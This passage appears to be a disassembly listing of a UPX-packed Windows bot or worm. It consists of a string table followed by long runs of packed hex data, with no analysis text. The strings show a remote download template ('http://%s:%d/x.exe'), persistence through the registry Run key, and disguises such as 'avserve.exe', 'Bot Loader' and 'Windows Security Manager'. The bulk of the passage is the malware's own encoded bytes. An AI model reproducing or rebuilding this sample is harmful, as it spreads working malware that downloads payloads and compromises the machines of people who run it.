'u13x',0 ; DATA XREF: sub_314223B2+38o align 4 aU12x db 'u12x',0 ; DATA XREF: sub_314223B2+31o align 4 aU11x db 'u11x',0 ; DATA XREF: sub_314223B2+2Ao align 4 aU10x db 'u10x',0 ; DATA XREF: sub_314223B2+23o align 4 aHttpSDX_exe db 'http://%s:%d/x.exe',0 ; DATA XREF: sub_31422712+2Do align 4 aSoftwareMicros db 'SOFTWARE\Microsoft\Windows\CurrentVersion\Run',0 ; DATA XREF: sub_314221C4+23o ; sub_314229E6+66o ... align 4 aCryptographicS db 'Cryptographic Service',0 ; DATA XREF: sub_314221C4+1Co ; sub_31422A9B+87o ... align 10h aFgnsdrjyrsert db 'fgnsdrjyrsert',0 ; DATA XREF: sub_314215C7+4Fo ; sub_31422B67+57o ... align 10h dd 2 dup(0) aSoftwareMicr_0 db 'Software\Microsoft\Wireless',0 ; DATA XREF: sub_31422B67+32o aClient db 'Client',0 ; DATA XREF: sub_31422B67+BCo ; sub_31422B67+F8o align 4 aId db 'ID',0 ; DATA XREF: sub_31422B67+37o ; sub_31422B67+75o align 10h aWindowsUpdate db 'Windows Update',0 ; DATA XREF: sub_314229E6+55o align 10h aMsConfigV13 db 'MS Config v13',0 ; DATA XREF: sub_314229E6+4Eo align 10h aAvserve2_exeup db 'avserve2.exeUpdate Service',0 ; DATA XREF: sub_314229E6+47o align 4 aAvserve_exe db 'avserve.exe',0 ; DATA XREF: sub_314229E6+40o aWindowsUpdateS db 'Windows Update Service',0 ; DATA XREF: sub_314229E6+39o align 10h aWinupdate db 'WinUpdate',0 ; DATA XREF: sub_314229E6+32o align 4 aSystray db 'SysTray',0 ; DATA XREF: sub_314229E6+2Bo aBotLoader db 'Bot Loader',0 ; DATA XREF: sub_314229E6+24o align 10h aSystemRestoreS db 'System Restore Service',0 ; DATA XREF: sub_314229E6+1Do align 4 aDiskDefragment db 'Disk Defragmenter',0 ; DATA XREF: sub_314229E6+16o align 4 aWindowsSecurit db 'Windows Security Manager',0 ; DATA XREF: sub_314229E6+Fo align 4 a1: ; DATA XREF: sub_31422B67+B7o unicode 0, <1>,0 dd 7 dup(0) dword_31424FE8 dd 0 ; sub_314221C4+80w dword_31424FEC dd 0 ; sub_314216A2+53o ... dword_31424FF0 dd 0 ; sub_3142207E:loc_3142212Cr ... dword_31424FF4 dd 70h ; UPX0:3142235Cw ... 
dword_31424FF8 dd 0 ; sub_314223B2+CEw dword_31424FFC dd 0 ; sub_31422712+20r dword_31425000 dd 31420000h ; UPX0:31422341w dword_31425004 dd 0 ; sub_314216A2+4Ao ... dword_31425008 dd 0 ; UPX0:314227C1w word_3142500C dw 0 ; DATA XREF: sub_3142255F+3Br ; sub_314225C3:loc_31422624r ... align 10h dword_31425010 dd 0 ; sub_31422B67+110w align 1000h UPX0 ends ; Section 2. (virtual address 00006000) ; Virtual size : 00002000 ( 8192.) ; Section size in file : 00002000 ( 8192.) ; Offset to raw data for section: 00006000 ; Flags E0000060: Text Data Executable Readable Writable ; Alignment : default ; =========================================================================== ; Segment type: Pure code ; Segment permissions: Read/Write/Execute UPX1 segment para public 'CODE' use32 assume cs:UPX1 ;org 31426000h assume es:nothing, ss:nothing, ds:UPX0, fs:nothing, gs:nothing dword_31426000 dd 0C4h, 40h, 72695601h, 6C617574h, 65657246h, 69560100h ; DATA XREF: UPX1:31427BB1o dd 61757472h, 6C6C416Ch, 100636Fh, 4D746547h, 6C75646Fh dd 6C694665h, 6D614E65h, 1004165h, 7274736Ch, 69706D63h dd 43010041h, 4679706Fh, 41656C69h, 69570100h, 6578456Eh dd 43010063h, 74616572h, 6F6F5465h, 6C65686Ch, 53323370h dd 7370616Eh, 746F68h, 6F725001h, 73736563h, 69463233h dd 747372h, 72655401h, 616E696Dh, 72506574h, 7365636Fh dd 50010073h, 65636F72h, 32337373h, 7478654Eh, 736C0100h dd 70637274h, 1004179h, 61657243h, 76456574h, 41746E65h dd 61570100h, 6F467469h, 6E695372h, 4F656C67h, 63656A62h dd 44010074h, 74656C65h, 6C694665h, 1004165h, 74697257h dd 6C694665h, 43010065h, 65736F6Ch, 646E6148h, 100656Ch dd 61657243h, 69466574h, 41656Ch, 74736C01h, 6E656C72h dd 6C010041h, 63727473h, 417461h, 74654701h, 74737953h dd 69446D65h, 74636572h, 4179726Fh, 65470100h, 636F4C74h dd 49656C61h, 416F666Eh, 6C530100h, 706565h, 746E4901h dd 6F6C7265h, 64656B63h, 68637845h, 65676E61h, 736C0100h dd 70637274h, 416E79h, 74654701h, 72727543h, 50746E65h dd 65636F72h, 1007373h, 50746547h, 41636F72h, 65726464h dd 1007373h, 
64616F4Ch, 7262694Ch, 41797261h, 72570100h dd 50657469h, 65636F72h, 654D7373h, 79726F6Dh, 704F0100h dd 72506E65h, 7365636Fh, 47010073h, 6F4D7465h, 656C7564h dd 646E6148h, 41656Ch, 74654701h, 6B636954h, 6E756F43h dd 43010074h, 74616572h, 74754D65h, 417865h, 65724301h dd 54657461h, 61657268h, 43010064h, 74616572h, 6F725065h dd 73736563h, 53010041h, 76457465h, 746E65h, 65704F01h dd 6576456Eh, 41746Eh, 69784501h, 72685474h, 646165h, 746E4901h dd 6F6C7265h, 64656B63h, 72636E49h, 6E656D65h, 52010074h dd 46646165h, 656C69h, 74654701h, 656C6946h, 657A6953h dd 78450100h, 72507469h, 7365636Fh, 47010073h, 614C7465h dd 72457473h, 726F72h, 0D100h, 0 dd 65520100h, 65724367h, 4B657461h, 78457965h, 52010041h dd 65536765h, 6C615674h, 78456575h, 52010041h, 75516765h dd 56797265h, 65756C61h, 417845h, 67655201h, 6E65704Fh dd 4579654Bh, 1004178h, 44676552h, 74656C65h, 6C615665h dd 416575h, 67655201h, 736F6C43h, 79654B65h, 62410100h dd 5374726Fh, 65747379h, 7568536Dh, 776F6474h, 100416Eh dd 70797243h, 65724374h, 48657461h, 687361h, 79724301h dd 61487470h, 61446873h, 1006174h, 70797243h, 72655674h dd 53796669h, 616E6769h, 65727574h, 43010041h, 74707972h dd 74736544h, 48796F72h, 687361h, 79724301h, 65447470h dd 6F727473h, 79654B79h, 72430100h, 52747079h, 61656C65h dd 6F436573h, 7865746Eh, 43010074h, 74707972h, 75716341h dd 43657269h, 65746E6Fh, 417478h, 79724301h, 6D497470h dd 74726F70h, 79654Bh, 0DE00h, 0EC00h, 72730100h, 646E61h dd 6D656D01h, 797063h, 72747301h, 6E656Ch, 6D656D01h, 746573h dd 6E617201h, 5F010064h, 65637865h, 685F7470h, 6C646E61h dd 337265h, 72747301h, 727473h, 72747301h, 726863h, 0E900h dd 11000h, 69460100h, 6957646Eh, 776F646Eh, 47010041h dd 6F467465h, 72676572h, 646E756Fh, 646E6957h, 100776Fh dd 57746547h, 6F646E69h, 72685477h, 50646165h, 65636F72h dd 64497373h, 73770100h, 6E697270h, 416674h, 0F400h, 12400h dd 6E490100h, 6E726574h, 704F7465h, 72556E65h, 100416Ch dd 65746E49h, 74656E72h, 6E65704Fh, 49010041h, 7265746Eh dd 4374656Eh, 65736F6Ch, 646E6148h, 100656Ch, 
65746E49h dd 74656E72h, 43746547h, 656E6E6Fh, 64657463h, 74617453h dd 49010065h, 7265746Eh, 5274656Eh, 46646165h, 656C69h dd 10000h, 13C00h, 73FF00h, 0FF0002FFh, 1FF000Dh, 39FF00h dd 0FF006FFFh, 17FF0034h, 0CFF00h, 0FF0009FFh, 13FF0004h dd 10FF00h, 0FF0016FFh, 3, 50000000h, 4C000045h, 0C8000201h dd 40D859h, 0 dd 0E0000000h, 0B010F00h, 601h, 26h, 12h, 34000000h, 23h dd 10h, 40h, 314200h, 10h, 4000002h, 0 dd 4000000h, 2 dup(0) dd 60h, 4, 2000000h, 0 dd 1000h, 10h, 1000h, 10h, 10000000h, 2 dup(0) dd 34000000h, 8C00002Dh, 15h dup(0) dd 7C000010h, 1, 5 dup(0) dd 2E000000h, 74786574h, 56000000h, 24h, 10h, 26h, 4, 2 dup(0) dd 20000000h, 2EE00400h, 61746164h, 14000000h, 10h, 40h dd 10h, 2Ah, 2 dup(0) dd 40000000h, 0C00000h, 3C000050h, 0C300002Fh, 0A1000054h dd 89254BBEh, 0DB43AA85h, 0AEF070A0h, 92A2047Dh, 4EC00F3Ch dd 27BE81Ch, 8402F26Ah, 47FC7D1Bh, 0F0024A19h, 0A033E402h dd 2164868h, 0D2B735D7h, 0A73D7D03h, 769F6801h, 36E6CCE6h dd 3A4A2064h, 1B5AB7CCh, 0DC87B734h, 6A7684E0h, 96F42A70h dd 0E6C8E38Ch, 5EC86080h, 7A97640Ah, 273E1B25h, 0A2280084h dd 364B003Fh, 3CD9B96Bh, 98B9B26Ch, 0E477BDE2h, 0DC016754h dd 317E500Fh, 0C777C3E4h, 0AC683B0Dh, 0D328C00Dh, 0B138CEDCh dd 0E56F08C9h, 0DB0C7A04h, 0D2484522h, 0DD2DC5F8h, 0D61B212Fh dd 402EDB1Ch, 67012DEh, 4C9039ECh, 40BCF844h, 0C27190D6h dd 1BDE5044h, 593B1E10h, 94B7336Fh, 8121970Dh, 67E9ACF9h dd 0E87CFEEBh, 1624A580h, 68250600h, 259D1C52h, 1CF25B07h dd 96F41276h, 899DE9C3h, 940AEF65h, 7BC87C6Ah, 64B1E3C3h dd 0C9BE490Ch, 991DD97Bh, 90E154E4h, 8C9FE924h, 0DCCCC349h dd 0CF78242Eh, 2C8248EDh, 0F864052Ch, 66F4150Ch, 3319A002h dd 8707A23h, 8F895E74h, 0F4C6DD0Eh, 1C51CC5Fh, 80B3EF9Ch dd 7F24E4A1h, 5A435A8h, 0B5D0781Bh, 571282F8h, 5A745737h dd 0ACBF931h, 74F80E14h, 9A0684Bh, 0CA28B753h, 2D3D74CEh dd 67ED85C9h, 0A0412069h, 0FFC55FFh, 35BAB9E8h, 50E49ED7h dd 0E9628ACh, 5B3002F0h, 5547BF4Dh, 8C0009F8h, 681583E4h dd 0F475583Bh, 1887EE42h, 851321C5h, 0A90A508Bh, 0BFF77FB6h dd 3C418B2Fh, 68C10357h, 488B4D2Ch, 50788B34h, 0A0F44D89h dd 0EE062AB4h, 
1C68D84Bh, 5D97D81Bh, 0F0F559AAh, 868D201h dd 0C18DEC12h, 0ED74C3B1h, 1110D70Dh, 0F46F0E82h, 1409B26Ah dd 0F84DF123h, 91762C51h, 18185085h, 892A6897h, 6C54A0E9h dd 0CA405DB0h, 46C0ED03h, 0EB346B63h, 9AAB1930h, 596ED578h dd 37DF055h, 0AB6745E6h, 0F03EDD4Bh, 53503151h, 9E0AC1Eh dd 0F435C4F7h, 17FAD6BDh, 3FEA6D6Ah, 5577D0F1h, 74C73BECh dd 1BEB5805h, 5AE57E17h, 25348CBFh, 5FC0E59h, 36E7345Fh dd 740807EBh, 0E1FC58EFh, 5F521E86h, 602F5151h, 0B269310Fh dd 5C91A144h, 0BAB8250Dh, 0DD20DB42h, 0B213B1AFh, 1133AEECh dd 2D590FEBh, 0B66AF9C2h, 99EDC4B1h, 0C803CBCh, 1450A850h dd 7D2774D6h, 5DC02C50h, 4459FC19h, 437C20BAh, 247C8B57h dd 0A5C58314h, 7E11D25Ah, 641A8717h, 803FFFF5h, 148861C2h dd 0F73B461Eh, 2480E97Ch, 0C68C003Bh, 54D5D6DBh, 5F2E448Bh dd 5657AC5Ah, 30181DDBh, 2F216674h, 8896DC73h, 50F02EEDh dd 565019h, 3C3ACAAh, 9577E134h, 49F44DC4h, 8F6B6E8Ch dd 0F00CFA68h, 0C908C7FFh, 349B6996h, 2E2ACC34h, 99AD734Ch dd 0A0A75EDh, 1A20BC50h, 3E160118h, 7C654A1h, 13B7FB8h dd 0ADF1CE74h, 8B0C407Dh, 51080100h, 5F24448Dh, 9B613421h dd 0D31130C5h, 74245903h, 7F84EE8h, 7BBCC15h, 662FC820h dd 3333C7FBh, 0C1F8C8E4h, 0B8510E7h, 4679B0D4h, 8B0200B6h dd 33125Dh, 0F3702647h, 19DC201h, 53C4EAC9h, 0A311E3C6h dd 0F2B57B35h, 0C3255035h, 26B69D83h, 0ADE74880h, 40666CB5h dd 41F0179Eh, 0BB683595h, 98CEE331h, 0B76C683Dh, 474FF044h dd 19B1606Ch, 0A54D54FEh, 2CC5D314h, 7C54DADCh, 0FC0DFE00h dd 33A134BAh, 2B7900B9h, 72C13BC7h, 72C18B02h, 0E1EBB76Fh dd 0E8A1292Bh, 23C70318h, 0FE25A3ACh, 233DCC96h, 786A1172h dd 0DA3140F8h, 0C4EB3C28h, 7750E113h, 6CF64F26h, 941ED411h dd 0CD3C6815h, 0BEE4D62h, 97386803h, 9D663E3Ch, 54533AB5h dd 0D0835253h, 8C47E0B1h, 4C29824h, 136D8223h, 0E643098h dd 0E8D0B1F7h, 8C316D4h, 0BBEE4E29h, 89574377h, 80686806h dd 27841D89h, 5D4F7E18h, 14EC6DA2h, 0F2D4C0h, 0C1345391h dd 27B6B6Ch, 80EB3A01h, 9AD468E6h, 1A4DFD77h, 0B34A3678h dd 0DCCD2F74h, 677A5EA3h, 0A3650C75h, 53FCA4FEh, 1AD9D251h dd 3A865613h, 0DC3E68D8h, 2656D88Ch, 58195EF9h, 0F8DA6A12h dd 5E0510C2h, 0EF4B56C0h, 0C6697A4h, 
0EC5D89E8h, 0DFFF050Dh dd 25EDF760h, 3A041FFFh, 43FCA3C3h, 8A1FE774h, 5FC984CCh dd 74E849BDh, 0EA6B50DFh, 64405F42h, 0A51985BAh, 440C6465h dd 2BE9AFA3h, 14F85F7Bh, 9E481FD8h, 0FACEADECh, 15207E68h dd 0E2EB624Eh, 5CC1CF53h, 455FE142h, 0AC019043h, 70661D7Bh dd 0B0333CAEh, 0D30711D6h, 23EDB43h, 803AD6E6h, 9B0D0AF9h dd 0ABB068B4h, 74E063A3h, 822B01D8h, 0F4A37B7Ch, 8609D9FBh dd 0B73DE4CDh, 29E04552h, 0EECDF670h, 1904640Dh, 68631BE2h dd 0EC1323B2h, 5C344FB5h, 1386EB13h, 0B06099AEh, 3569FB1Ah dd 397044F8h, 90252C40h, 0D2908F93h, 70CDC864h, 90458C13h dd 9406EF5Ch, 72391C54h, 9C4C98E4h, 0A43CA044h, 47239134h dd 0AC2CA88Eh, 391CB024h, 0B4C8E472h, 0BC14B818h, 9F0CC010h dd 0C41C8E47h, 0CC04C808h, 0F8D04DFCh, 2391C8E4h, 0F0D8F4D4h dd 85AEECDCh, 0E8E07239h, 487E4E4h, 8B66BDh, 0A36CD337h dd 0B978DADEh, 2FCB06Dh, 7309838Ch, 0EC8C3412h, 415C0376h dd 4A8D9085h, 0EB0CFF59h, 4D8D1AE8h, 0B40DE438h, 0C9391A5Ch dd 870BF07Ch, 0D4683974h, 37A8AB4Dh, 0B6326277h, 0C4064DCCh dd 843E0D6Dh, 9ABC4984h, 4E570465h, 2ADB3B72h, 0A341521h dd 276E16A2h, 41173E3Ah, 5F9A2842h, 7D21E014h, 0F818B4E8h dd 0EB9C1388h, 0C28242E3h, 5A159993h, 1B6095AFh, 63554703h dd 0DE7FA480h, 0AD11F0AAh, 0B458A51h, 32FF6A9Eh, 80C1EDDBh dd 0CC3A52C3h, 0DC5D3831h, 0F108FE3Ah, 0B5D8825h, 0FFD07D2h dd 5A0C35B7h, 0F80CFF59h, 0F7990F93h, 8ED603FEh, 0FB80C3FEh dd 2ED572FFh, 5EBDC65Bh, 5F7662BAh, 9813B264h, 68336F04h dd 56DA0958h, 81084F38h, 0C70D040Ah, 9DB59B0h, 80758F0Bh dd 609B492Dh, 5FF90F75h, 1E892C25h, 3D9DADE4h, 3FF8432h dd 0FB8143D7h, 0B50DBE71h, 5F9F9623h, 6BA65D87h, 7B4F3B16h dd 6DA25A73h, 0E6573C19h, 9973002Fh, 0FDBE78B7h, 0F6FEFF04h dd 61887F3Ch, 33FC6C5Bh, 88BF50Fh, 0AADCF33Bh, 0D8B3B276h dd 57A0A33Eh, 9C572F9Eh, 2259ED9h, 1359F8D6h, 256E25C3h dd 0B3BBFF0Eh, 0C3F2EE75h, 68E1AC8Eh, 0D3A62710h, 969ED3BEh dd 84C1C180h, 50A92D70h, 1052AD62h, 8FC2454Eh, 0BA6032F5h dd 0F2AA5C6Ah, 0E0F9DCDFh, 0BFC3A4Ch, 6468B003h, 372DD4Eh dd 11103B06h, 0D742BA27h, 6CE012F7h, 0B80C609h, 0B02B39DFh dd 556F0BB0h, 84579356h, 80CC78D8h, 5113E6D8h, 
68661C4Dh dd 0FD1F0CA5h, 0D91462F4h, 538906EEh, 20BF661h, 838506Ah dd 0A05BFDAFh, 0D2052C5Dh, 18740096h, 73071109h, 1001478Dh dd 141905h, 9DD8513h, 1706D84Fh, 42BDAA0Eh, 74F081DBh dd 0C7D5530Dh, 0BE111051h, 392101E1h, 3A18244Ch, 7EED85EDh dd 0D876D811h, 264BA586h, 0EF144D2Ch, 6C192596h, 0EBA20577h dd 8B750DF2h, 65B8B076h, 68FADDEBh, 0C11B333Fh, 968160C8h dd 77D0150Ch, 6EA96236h, 90140810h, 2F874BA3h, 5618D951h dd 0D8D85CFCh, 0F61837B2h, 743D563Eh, 6311CE05h, 61412ADCh dd 0B74B2C9Ch, 102050D3h, 59030818h, 0AA0B62FCh, 8B550F5Eh dd 5ACEE1C6h, 2E33A257h, 56532C56h, 0C9901884h, 25270055h dd 5ACE5903h, 40C520Ah, 9262CF20h, 28AF5D0Ch, 89E2B701h dd 21DE53C3h, 948E694Eh dd 13F6F438h, 5C1E3C34h, 0F7794E36h, 43ADDE04h, 281D146Ch dd 687AA42Dh, 92C1EC35h, 0F4D85A2Dh, 22F40910h, 0CF203BD0h dd 0EEF8367Ah, 477D221Dh, 11E748Dh, 0F556FC7Bh, 4804C1FEh dd 0B5FF1C1Eh, 0B9B345E0h, 0FF452F20h, 8521F0Fh, 61C35760h dd 1C465033h, 3489BD76h, 0B733A074h, 57D6A93Ch, 0D91B1C8h dd 984FACB6h, 1C80D406h, 0D8E47239h, 0E06CDC74h, 9148E460h dd 0E88E4723h, 0F020EC3Ch, 1934D110h, 0B700F4CCh, 63BF0B84h dd 647CE261h, 8B7EF9BEh, 0A16451A2h, 0B4C43D18h, 0CBD83608h dd 0E177572h, 0A64D1D49h, 2A099E9Ah, 0BDA3833Eh, 8A460975h dd 7888E044h, 8C47F46Ah, 0B40974B0h, 6A885974h, 8BB38163h dd 84BCDE59h, 7A2F22A1h, 0E0833FC1h, 5C08303h, 86B9CD57h dd 0FD594A8Bh, 509D10CFh, 3D12186Eh, 1C3DD607h, 0E26EE66h dd 50E83F14h, 982CEF42h, 2040A261h, 4B7CCA41h, 0D7C63F68h dd 0CC59B306h, 1B41D986h, 0CFA125D3h, 0B801F454h, 9681E007h dd 9F8B0F40h, 3EC18817h, 481FC517h, 5FD14C7h, 25596D30h dd 0E0B3BA10h, 0BF501D6Ah, 86103DD8h, 51FC71F0h, 1537743Fh dd 31583A06h, 60A7BB0Ah, 0BEFD8A06h, 0F45352D1h, 7EE6BC3Dh dd 3D53D8B3h, 0FEBB138h, 0A0C1CE59h, 0B632BDB3h, 38DE1B68h dd 65E265B0h, 0C868C226h, 5B373B4Fh, 0BB46D1F6h, 971A0DB9h dd 41D60B35h, 4C125E12h, 7A4EC6F0h, 0C631EE4Ah, 0B6413BBBh dd 2CFD90CCh, 90B610B5h, 480718B7h, 6015EB0Ch, 2D1880E5h dd 0AF1909CDh, 5132BA1Eh, 44330C5Dh, 0EC5B3D50h, 6A7D6883h dd 0CC401113h, 0F42A66E7h, 2806FF00h, 
0A910F805h, 0F49199EFh dd 51001BF0h, 8DF7DF9Bh, 723B8D1Ah, 0BE98114h, 0AD85042Dh dd 1B1FDBEh, 2BEC7317h, 0CC48BC8h, 88BE18Bh, 0B5B236EAh dd 4353A302h, 45055C64h, 58363605h, 0A2000049h, 0F1022C02h dd 8F34BF14h, 52240206h, 80314153h, 0B77FFFFFh, 0F501018Fh dd 7911838Dh, 0E42AEC52h, 49E7F63Ah, 0BEE0EA9Bh, 7EDB21AFh dd 0FFFA9544h, 5E1AFFFFh, 85A03261h, 949F6A1Fh, 843994FFh dd 358F26A6h, 0A55C1DCEh, 7AB20BC9h, 0FF307265h, 371FFFFFh dd 697A6F4Dh, 2F616C6Ch, 20302E34h, 6D6F6328h, 69746170h dd 3B656C62h, 0FFFD4D20h, 4953FB5Bh, 15362045h, 6E695709h dd 73776F64h, 20544E20h, 29312E35h, 0D40BBB3Dh, 8EE434h dd 0C40104D4h, 0CF3DF7B4h, 90A00EF3h, 68047480h, 3CF3CF0Eh dd 480958DFh, 30D4743Ch, 64D937CFh, 10222045h, 0ED00304Ah dd 0F83E437Fh, 76631340h, 75722E76h, 0BDB6367Eh, 70077B5h dd 976C6465h, 0C1660F65h, 0FF7B7FF2h, 61657365h, 0E686372h dd 626F721Fh, 6863786Fh, 0DB676E61h, 0D2B9BB7Fh, 0C74651Fh dd 622E6472h, 61007A69h, 85D86328h, 6B68E46Dh, 740C6D61h dd 24782D06h, 0B9BB6DB3h, 6F6C0600h, 6B37620Eh, 0BEF6FD47h dd 276266Dh, 76742E7Ah, 6F74111Bh, 856E2E70h, 178C2D80h dd 27730F69h, 80FF0B33h, 0F788D6Dh, 6C756461h, 4B652D74h dd 7EDB7669h, 338072B3h, 73A66E6Fh, 622E744Eh, 0DF0AC07Dh dd 67694F67h, 77780032h, 5B7FB361h, 626A2CFBh, 9B00AD62h dd 6166617Ah, 0F84887A8h, 655D2EB6h, 61AF5C23h, 0F6EDF862h dd 656463FFh, 69686766h, 6D6C6B6Ah, 7271C56Eh, 777675F7h dd 0FFC67978h, 650E50DFh, 46454443h, 4A494847h, 4E4D4C4Bh dd 5451504Fh, 0FF68C3FFh, 57565554h, 1B5A5958h, 74746823h dd 2F2F3A70h, 3B9BF025h, 2F0B73B0h, 702E9765h, 7B3F7068h dd 0EB6FB7Eh, 73260F3Dh, 64066E63h, 666E6926h, 29073B76h dd 313D7DB7h, 74132639h, 58EBA01Bh, 60F6BBFBh, 3732313Dh dd 3A3101A8h, 2F303038h, 80FFDF65h, 0DFEC8Dh, 335DDFE8h dd 0EEB966C9h, 0FFDB6FFFh, 5758D01h, 68AFE8Bh, 4607993Ch dd 46302C06h, 7889934h, 0EBEDE247h, 0E8342FF7h, 7EDAE80Ah dd 2E6765DFh, 0C9999371h, 0DFFFEF01h, 0BDFD12FEh, 716FD91h dd 0AA6872C1h, 0AA66FD42h, 14BA10FDh, 1A98A91Ch, 0F75BB1FFh dd 0F198F3C9h, 71028608h, 5F9010C0h, 599237CBh, 0F931C96h dd 
3A78B3FBh, 7157E414h, 713A0A7Dh, 0BEFB9D45h, 0F19DF3EDh dd 0F1098904h, 40119C04h, 0FD8EEDB3h, 0E3F36723h, 0DC1C10F0h dd 6059B20Bh, 3D8FC99Bh, 125EFF6h, 0A10414D9h, 9E71CA17h dd 61688D2Bh, 964617B3h, 0E21AAD91h, 28111D96h, 0ED6F6D9Fh dd 0C850B2h, 57DC1499h, 4E122555h, 0DFECC0A4h, 1291EDDEh dd 0F7ED9949h, 0C4140054h, 71CBCA3Ah, 87B31C3Bh, 24FFFDDDh dd 0CF1A21E4h, 668FCDCDh, 0FBB6812Ch, 1E3F6C9Fh, 83B8B0FBh dd 5D12CDC3h, 1DCBC9A8h, 6F9DB27Fh, 0B24AD25h, 96A6485Ah dd 0C9FECBC0h, 4C1B1464h, 0F3EBA729h, 0D9FFBA9Ch, 16E9B3F7h dd 7126F434h, 0F90EFCF5h, 29EF133Bh, 6FFF6B46h, 5F37F776h dd 0EC4766DEh, 116A0A8h, 0EDFFC5B7h, 0FDE9ECE9h, 0EF610FBBh dd 2CE1FCB7h, 0FCF5CA01h, 0FCF25AFCh, 0FDBFFFE5h, 0F5FCF7EBh dd 0C7D6ABAAh, 59AAF934h, 2A2A25B4h, 93ACC966h, 0BEB78190h dd 90FF67F0h, 0C983639Dh, 309271CDh, 513519BFh, 0A95D914h dd 0FFFF9172h, 712AEC20h, 0A5D2EBC8h, 0E180D512h, 6FAA529Ah dd 9A2A8D14h, 46FEDFC8h, 8B12B9FBh, 0C3474A9Ah, 0DB9BAB9Eh dd 0EC20A319h, 0FFDDA26Ch, 0BDFFFDBFh, 0DF9EED85h, 0EB81E8A2h dd 0C8125544h, 2E961FBDh, 0D812EB8Dh, 125A9A85h, 0FF9A099Dh dd 5ACD0B09h, 0D096F810h, 7F664922h, 8712FEFDh, 0BB6F6EDBh dd 95C25AA9h, 82128502h, 0CB5A9104h, 0F9B9CFF7h, 857F4067h dd 424D53FFh, 0C8531872h, 9CFF4BFh, 62FEFFh, 83435002h dd 4F575445h, 0E35BED52h, 50204BFFh, 52474F52h, 31204D41h dd 414C17CDh, 52024D4Eh, 0A6290EBh, 0B71566ABh, 0B75BB696h dd 0BB676B03h, 330E7075h, 0B61F611Ah, 4D27EB74h, 21583223h dd 2E323232h, 66D35831h, 2018D62Ah, 5A8B323Ch, 0A433C8C9h dd 0EC1B0773h, 0C2285DBh, 40023FFh, 20140A11h, 8DDADE05h dd 69A0D41Ah, 534B4C00h, 4915053h, 97B7887Fh, 4AE00882h dd 0EDF81773h, 6E240057h, 6F006400h, 3A730075h, 5EDEC874h dd 901306Ch, 3500398Ch, 0DCC06C23h, 72E1D96h, 32ABDA00h dd 889CF20h, 3B57DA20h, 9F4C9383h, 46F20003h, 0C1901E23h dd 40074706h, 0D1060006h, 1046E7FFh, 8A151F01h, 48E088h dd 8144004Fh, 0FE1BFFFDh, 0F27A6A19h, 281C49E4h, 742530AFh dd 0E1536710h, 137C853Ch, 3075DF5Ch, 0AEBD0400h, 75CB6B9h dd 5C085ABDh, 72363761h, 72E4DD7h, 2E380036h, 3B1B3077h dd 496D899Bh, 
0E843EC00h, 0F9633F00h, 640E7900h, 4DC08A2h dd 6DFF20F6h, 0FF1640h, 0E00DEDEh, 19F1600h, 9BF2602h dd 28401213h, 0C1110319h, 8B7DC346h, 0D374D96Ch, 0BBE42970h dd 9C2A9BACh, 0D81D256Bh, 109F6DB3h, 1B04480Eh, 5D6DCF54h dd 5A5413D7h, 22596326h, 83CBC75Ch, 45B9FF34h, 58765h dd 4810030Bh, 0C5FFFFB8h, 0EB810DEh, 286A050Bh, 0B10C3919h dd 0A89B11D0h, 7D4FC000h, 0D9EC7FE1h, 5D5FF52Eh, 1CEB8A88h dd 0E89F11C9h, 48102B3Ch, 0B22E7C60h, 0F40CD197h, 0CA060A3h dd 95E43C80h, 0CB10CA0h, 32393BFEh, 880CA000h, 90040h dd 847B03ECh, 7F927h, 4F401495h, 0BF40707Ch, 6C8A5ECh dd 13430700h, 88FFC279h, 138578h, 0E9A65BABh, 18F81013h dd 2FE409CFh, 230EFEFFh dd 0D45830C1h, 8408BE40h, 7DD3E488h, 10B943D2h, 0B801FFEEh dd 79366110h, 0AD200CF2h, 9F7F070Dh, 0FF215E5h, 700118D8h dd 0F900F84h, 0F842579h, 4D000F95h, 206FC9Eh, 6C0F847Fh dd 84AADE0Fh, 0A89A0087h, 93F436Fh, 1F13C88Ch, 50586E69h dd 0C0A6DB20h, 7250CAh, 39014446h, 3C844FC9h, 123C6B32h dd 7B027515h, 413C840Dh, 941C0053h, 1CAFFF01h, 0C606EB22h dd 73255C5Ch, 6370695Ch, 9BFFF975h, 0EC816624h, 0E4FF071Ch dd 44655300h, 67756265h, 0FA377669h, 67853518h, 6A6441A7h dd 6F546175h, 0EC99B6E4h, 176E656Bh, 126F4C73h, 0BF6D7075h dd 61569FDDh, 4165756Ch, 28704F17h, 7324636Fh, 8D48EA58h dd 76430034h, 65333F61h, 0E33152A3h, 0F86D4C79h, 0F5056D1Bh dd 545F1165h, 57796172h, 95D52DB5h, 31431735h, 52521A61h dd 682DBB9Dh, 6854056Fh, 7356140Ch, 0A35B6B75h, 284158DBh dd 0A578454Fh, 77336D67h, 47356E3Ah, 121EF3F5h, 48F46897h dd 7F505454h, 5732203Ch, 0FDEF52B5h, 0D4B4F20h, 9F4B010Ah dd 6ADF6644h, 4C2D02BBh, 3A2D6704h, 18752520h, 0CA587B5Ah dd 7954282Fh, 0A66D26B5h, 70A3DAB6h, 15836386h, 8EA9EE2Fh dd 2DC7025Ah, 42C97293h, 9F56B18Bh, 2B004757h, 0A35B47BAh dd 0E564F6F4h, 42CB73CBh, 6D8D57FBh, 0A9637673h, 0DA6977CBh dd 0F1538B77h, 175F3203h, 9A69E775h, 7B5E62Eh, 36373803h dd 0A6BB2774h, 331F3435h, 32033369h, 0D34B75F2h, 13393031h dd 0C8383F38h, 370D8320h, 20353607h, 34320C83h, 909A3233h dd 3031C83Ah, 0F93AF378h, 0CC95ACFFh, 4F53BBD9h, 41575446h dd 4D5C4552h, 62C1F869h, 
6F736F7Bh, 5CBF5CD7h, 72727543h dd 6B61BC22h, 73DC5615h, 75525C0Ah, 85B79F6Eh, 74231716h dd 6824D26Fh, 0FF532030h, 1B6850A3h, 673BE3F7h, 7264736Eh dd 1D93706Ah, 652B79B6h, 51530002h, 6612D86h, 6C0E5F06h dd 5736264Dh, 5F664B68h, 60C14923h, 34421C28h, 68FF5455h dd 130BC037h, 5E432053h, 0D5762067h, 0FB95B7B3h, 8058763Bh dd 0C823B532h, 7C65B05Eh, 0FC471A1Bh, 23596E66h, 79931217h dd 36346B73h, 4200707Eh, 61BF2063h, 0B7B5B623h, 6D1B1358h dd 0DD975220h, 0B4B63772h, 0E0440300h, 2F660E20h, 0EE7B25B0h dd 2AAC6D67h, 5B632463h, 22BFDAE4h, 20797469h, 1E6E614Dh dd 0AC31B81Ah, 74201501h, 2A2AAE89h, 0FD92BBC4h, 0EC01388Ch dd 65657246h, 0DBF0060Ch, 470DF923h, 6F4D7465h, 978A5F87h dd 6B4665E2h, 686D614Eh, 74736C01h, 0C01AEF7Bh, 0A956372h dd 79706F43h, 